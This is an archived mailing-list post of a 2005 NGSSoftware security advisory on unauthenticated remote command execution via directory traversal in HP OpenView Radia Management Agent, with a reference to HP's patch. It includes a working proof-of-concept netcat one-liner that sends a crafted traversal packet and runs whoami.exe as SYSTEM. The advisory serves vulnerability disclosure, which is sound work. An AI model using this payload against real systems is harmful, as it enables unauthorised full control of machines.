Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] HP OpenView Radia Management Agent remote command execution

from [NGSSoftware Insight Security Research] Network Security [Permanent Link]
Subject: [VulnWatch] HP OpenView Radia Management Agent remote command execution via directory traversal
Date: Thu, 28 Jul 2005 10:19:56 +0100 
NGSSoftware Insight Security Research Advisory

Name: HP OpenView Radia Management Agent remote command execution via
directory traversal
Systems Affected: HP OpenView Radia Management Portal versions 2.x and
1.x running Radia Management Agent
Severity: High
Vendor URL: http://www.hp.com/
Authors: David Morgan      davidm@ngssoftware.com
         Dominic Beecher   dominic@ngssoftware.com
Date of initial advisory:  28 April 2005
Date of full advisory:     28 July 2005

Description
-----------

The Radia Management Agent is part of HP's OpenView Radia suite of
software. It runs as a Windows service (RMA) with Local System
privileges. The RMA service listens on a TCP port that is not fixed. In
the example below, the service was listening on TCP port 1065.

By connecting to the TCP port and sending a crafted packet, it is
possible to traverse out of C:\Program Files\Novadigm (the apparent
working directory) and run any executable that is located on the same
logical disk partition, in this case the C: drive.

Details
-------

C:\>sc queryex rma

SERVICE_NAME: rma
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE,
IGNORES_SHUTDOWN))
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 1032
        FLAGS              :

C:\>netstat -ano

Active Connections

  Proto  Local Address      Foreign Address        State           PID
  TCP    0.0.0.0:1065       0.0.0.0:0              LISTENING       1032

bash$ printf "\x00\x00\x00../../windows/system32/whoami.exe\x00" | nc -v
xx.xx.xx.xx 1065

host.domain [xx.xx.xx.xx] 1065 (?) open
nt authority\system

The output from whoami.exe clearly demonstrates that it is possible for
a remote attacker to execute arbitrary system commands with Local System
privileges without authentication.

Fix Information
---------------

HP has developed a patch to fix the problem. More information can be
found in their security bulletin HPSBMA01138:

http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBMA01138

About NGSSoftware
-----------------

NGSSoftware design, research and develop intelligent, advanced
application security assessment scanners. Based in the United Kingdom,
NGSSoftware have offices in the South of London and the East Coast of
Scotland. NGSSoftware's sister company NGSConsulting, offers best of
breed security consulting services, specialising in application, host
and network security assessments.

http://www.ngssoftware.com/

Tel: +44 (0)20 8401 0070
Fax: +44 (0)20 8401 0076

enquiries@ngssoftware.com

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] HP OpenView Radia Management Agent remote command execution via directory traversal, NGSSoftware Insight Security Research <=
Previous by Date:  [Full-disclosure] [USN-149-3] Ubuntu 4.10 update for Firefox vulnerabilities, Martin Pitt
Next by Date:  MDKSA-2005:125 - Updated clamav packages fix more vulnerabilities, Mandriva Security Team
Previous by Thread:  [Full-disclosure] [USN-149-3] Ubuntu 4.10 update for Firefox vulnerabilities, Martin Pitt
Next by Thread:  MDKSA-2005:125 - Updated clamav packages fix more vulnerabilities, Mandriva Security Team
Indexes:  [Date] [Thread] [Top] [All Lists]